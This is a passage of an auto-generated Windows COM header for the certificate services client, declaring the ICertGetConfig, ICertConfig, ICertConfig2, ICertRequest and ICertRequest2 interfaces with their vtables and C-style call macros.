#endif 	/* __ICertGetConfig_FWD_DEFINED__ */


#ifndef __ICertConfig_FWD_DEFINED__
#define __ICertConfig_FWD_DEFINED__
typedef interface ICertConfig ICertConfig;

#endif 	/* __ICertConfig_FWD_DEFINED__ */


#ifndef __ICertConfig2_FWD_DEFINED__
#define __ICertConfig2_FWD_DEFINED__
typedef interface ICertConfig2 ICertConfig2;

#endif 	/* __ICertConfig2_FWD_DEFINED__ */


#ifndef __ICertRequest_FWD_DEFINED__
#define __ICertRequest_FWD_DEFINED__
typedef interface ICertRequest ICertRequest;

#endif 	/* __ICertRequest_FWD_DEFINED__ */


#ifndef __ICertRequest2_FWD_DEFINED__
#define __ICertRequest2_FWD_DEFINED__
typedef interface ICertRequest2 ICertRequest2;

#endif 	/* __ICertRequest2_FWD_DEFINED__ */


#ifndef __ICertRequest3_FWD_DEFINED__
#define __ICertRequest3_FWD_DEFINED__
typedef interface ICertRequest3 ICertRequest3;

#endif 	/* __ICertRequest3_FWD_DEFINED__ */


#ifndef __CCertGetConfig_FWD_DEFINED__
#define __CCertGetConfig_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertGetConfig CCertGetConfig;
#else
typedef struct CCertGetConfig CCertGetConfig;
#endif /* __cplusplus */

#endif 	/* __CCertGetConfig_FWD_DEFINED__ */


#ifndef __CCertConfig_FWD_DEFINED__
#define __CCertConfig_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertConfig CCertConfig;
#else
typedef struct CCertConfig CCertConfig;
#endif /* __cplusplus */

#endif 	/* __CCertConfig_FWD_DEFINED__ */


#ifndef __CCertRequest_FWD_DEFINED__
#define __CCertRequest_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertRequest CCertRequest;
#else
typedef struct CCertRequest CCertRequest;
#endif /* __cplusplus */

#endif 	/* __CCertRequest_FWD_DEFINED__ */


#ifndef __CCertServerPolicy_FWD_DEFINED__
#define __CCertServerPolicy_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertServerPolicy CCertServerPolicy;
#else
typedef struct CCertServerPolicy CCertServerPolicy;
#endif /* __cplusplus */

#endif 	/* __CCertServerPolicy_FWD_DEFINED__ */


#ifndef __CCertServerExit_FWD_DEFINED__
#define __CCertServerExit_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertServerExit CCertServerExit;
#else
typedef struct CCertServerExit CCertServerExit;
#endif /* __cplusplus */

#endif 	/* __CCertServerExit_FWD_DEFINED__ */


/* header files for imported files */
#include "wtypes.h"
#include "certif.h"

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certcli_0000_0000 */
/* [local] */ 

#include <winapifamily.h>
#pragma region Desktop Family
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)


extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0000_v0_0_s_ifspec;

#ifndef __ICertGetConfig_INTERFACE_DEFINED__
#define __ICertGetConfig_INTERFACE_DEFINED__

/* interface ICertGetConfig */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertGetConfig;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("c7ea09c0-ce17-11d0-8833-00a0c903b83c")
    ICertGetConfig : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE GetConfig( 
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertGetConfigVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertGetConfig * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertGetConfig * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertGetConfig * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertGetConfig * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *GetConfig )( 
            __RPC__in ICertGetConfig * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        END_INTERFACE
    } ICertGetConfigVtbl;

    interface ICertGetConfig
    {
        CONST_VTBL struct ICertGetConfigVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertGetConfig_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertGetConfig_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertGetConfig_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertGetConfig_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertGetConfig_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertGetConfig_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertGetConfig_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertGetConfig_GetConfig(This,Flags,pstrOut)	\
    ( (This)->lpVtbl -> GetConfig(This,Flags,pstrOut) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertGetConfig_INTERFACE_DEFINED__ */


#ifndef __ICertConfig_INTERFACE_DEFINED__
#define __ICertConfig_INTERFACE_DEFINED__

/* interface ICertConfig */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertConfig;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("372fce34-4324-11d0-8810-00a0c903b83c")
    ICertConfig : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Reset( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__out LONG *pCount) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Next( 
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetField( 
            /* [in] */ __RPC__in const BSTR strFieldName,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetConfig( 
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertConfigVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertConfig * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertConfig * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertConfig * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertConfig * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertConfig * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertConfig * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Reset )( 
            __RPC__in ICertConfig * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__out LONG *pCount);
        
        HRESULT ( STDMETHODCALLTYPE *Next )( 
            __RPC__in ICertConfig * This,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *GetField )( 
            __RPC__in ICertConfig * This,
            /* [in] */ __RPC__in const BSTR strFieldName,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        HRESULT ( STDMETHODCALLTYPE *GetConfig )( 
            __RPC__in ICertConfig * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        END_INTERFACE
    } ICertConfigVtbl;

    interface ICertConfig
    {
        CONST_VTBL struct ICertConfigVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertConfig_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertConfig_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertConfig_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertConfig_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertConfig_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertConfig_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertConfig_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertConfig_Reset(This,Index,pCount)	\
    ( (This)->lpVtbl -> Reset(This,Index,pCount) ) 

#define ICertConfig_Next(This,pIndex)	\
    ( (This)->lpVtbl -> Next(This,pIndex) ) 

#define ICertConfig_GetField(This,strFieldName,pstrOut)	\
    ( (This)->lpVtbl -> GetField(This,strFieldName,pstrOut) ) 

#define ICertConfig_GetConfig(This,Flags,pstrOut)	\
    ( (This)->lpVtbl -> GetConfig(This,Flags,pstrOut) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertConfig_INTERFACE_DEFINED__ */


#ifndef __ICertConfig2_INTERFACE_DEFINED__
#define __ICertConfig2_INTERFACE_DEFINED__

/* interface ICertConfig2 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertConfig2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("7a18edde-7e78-4163-8ded-78e2c9cee924")
    ICertConfig2 : public ICertConfig
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE SetSharedFolder( 
            /* [in] */ __RPC__in const BSTR strSharedFolder) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertConfig2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertConfig2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertConfig2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertConfig2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertConfig2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Reset )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__out LONG *pCount);
        
        HRESULT ( STDMETHODCALLTYPE *Next )( 
            __RPC__in ICertConfig2 * This,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *GetField )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in const BSTR strFieldName,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        HRESULT ( STDMETHODCALLTYPE *GetConfig )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrOut);
        
        HRESULT ( STDMETHODCALLTYPE *SetSharedFolder )( 
            __RPC__in ICertConfig2 * This,
            /* [in] */ __RPC__in const BSTR strSharedFolder);
        
        END_INTERFACE
    } ICertConfig2Vtbl;

    interface ICertConfig2
    {
        CONST_VTBL struct ICertConfig2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertConfig2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertConfig2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertConfig2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertConfig2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertConfig2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertConfig2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertConfig2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertConfig2_Reset(This,Index,pCount)	\
    ( (This)->lpVtbl -> Reset(This,Index,pCount) ) 

#define ICertConfig2_Next(This,pIndex)	\
    ( (This)->lpVtbl -> Next(This,pIndex) ) 

#define ICertConfig2_GetField(This,strFieldName,pstrOut)	\
    ( (This)->lpVtbl -> GetField(This,strFieldName,pstrOut) ) 

#define ICertConfig2_GetConfig(This,Flags,pstrOut)	\
    ( (This)->lpVtbl -> GetConfig(This,Flags,pstrOut) ) 


#define ICertConfig2_SetSharedFolder(This,strSharedFolder)	\
    ( (This)->lpVtbl -> SetSharedFolder(This,strSharedFolder) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertConfig2_INTERFACE_DEFINED__ */


#ifndef __ICertRequest_INTERFACE_DEFINED__
#define __ICertRequest_INTERFACE_DEFINED__

/* interface ICertRequest */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertRequest;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("014e4840-5523-11d0-8812-00a0c903b83c")
    ICertRequest : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Submit( 
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RetrievePending( 
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetLastStatus( 
            /* [retval][out] */ __RPC__out LONG *pStatus) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestId( 
            /* [retval][out] */ __RPC__out LONG *pRequestId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDispositionMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCACertificate( 
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCertificate( 
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertRequestVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertRequest * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertRequest * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertRequest * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertRequest * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Submit )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *RetrievePending )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastStatus )( 
            __RPC__in ICertRequest * This,
            /* [retval][out] */ __RPC__out LONG *pStatus);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestId )( 
            __RPC__in ICertRequest * This,
            /* [retval][out] */ __RPC__out LONG *pRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetDispositionMessage )( 
            __RPC__in ICertRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage);
        
        HRESULT ( STDMETHODCALLTYPE *GetCACertificate )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificate )( 
            __RPC__in ICertRequest * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        END_INTERFACE
    } ICertRequestVtbl;

    interface ICertRequest
    {
        CONST_VTBL struct ICertRequestVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertRequest_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertRequest_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertRequest_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertRequest_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertRequest_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertRequest_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertRequest_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertRequest_Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition) ) 

#define ICertRequest_RetrievePending(This,RequestId,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> RetrievePending(This,RequestId,strConfig,pDisposition) ) 

#define ICertRequest_GetLastStatus(This,pStatus)	\
    ( (This)->lpVtbl -> GetLastStatus(This,pStatus) ) 

#define ICertRequest_GetRequestId(This,pRequestId)	\
    ( (This)->lpVtbl -> GetRequestId(This,pRequestId) ) 

#define ICertRequest_GetDispositionMessage(This,pstrDispositionMessage)	\
    ( (This)->lpVtbl -> GetDispositionMessage(This,pstrDispositionMessage) ) 

#define ICertRequest_GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate) ) 

#define ICertRequest_GetCertificate(This,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCertificate(This,Flags,pstrCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertRequest_INTERFACE_DEFINED__ */


#ifndef __ICertRequest2_INTERFACE_DEFINED__
#define __ICertRequest2_INTERFACE_DEFINED__

/* interface ICertRequest2 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertRequest2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("a4772988-4a85-4fa9-824e-b5cf5c16405a")
    ICertRequest2 : public ICertRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE GetIssuedCertificate( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetErrorMessageText( 
            /* [in] */ LONG hrMessage,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrErrorMessageText) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAProperty( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAPropertyFlags( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__out LONG *pPropFlags) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAPropertyDisplayName( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDisplayName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetFullResponseProperty( 
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertRequest2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertRequest2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertRequest2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertRequest2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertRequest2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
